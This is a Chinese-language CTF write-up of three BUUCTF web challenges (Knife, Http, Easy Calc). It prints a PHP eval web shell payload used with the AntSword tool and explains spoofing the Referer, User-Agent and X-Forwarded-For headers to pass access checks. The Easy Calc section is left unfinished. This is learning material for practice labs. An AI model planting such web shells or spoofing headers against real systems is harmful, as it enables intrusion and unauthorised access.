[极客大挑战 2019]Knife
很明显的提示,用中国菜刀或者蚁剑,这里我使用蚁剑
构造payload:/?<?php eval($_POST["Syc"]);?>
打开蚁剑添加数据
URL地址为:http://094fc751-45ef-4f6e-961d-daee474ee7b4.node4.buuoj.cn/index.php
密码为:Syc
用蚁剑查看目录
查看根目录,找到flag
进入flag文件夹里
拿到flag~~
[极客大挑战 2019]Http
查看源代码,发现有一个Secret.php
进入这个访问该目录
提示:It doesn’t come from ‘https://www.Sycsecret.com’,也就是说这个页面得来自https://www.Sycsecret.com,添加referer即可
提示Please use “Syclover” browser:请使用“Syclover”浏览器
添加User-Agent:Syclover
提示No!!! you can only read this locally!!!:不! !您只能在本地阅读!!
添加X-Forwarded-For:127.0.0.1
拿到flag~~
[RoarCTF 2019]Easy Calc
对我来说是一道难题,不过又学到好多
查看源码
抓包
发现calc.php,访问一下
有个黑名单
OKOK,上面是我所有收集到的信息,然后源码有部分也看不懂,不知道该怎么下手,甚至还不知道这是个什么类型的题目,下面开始学习大佬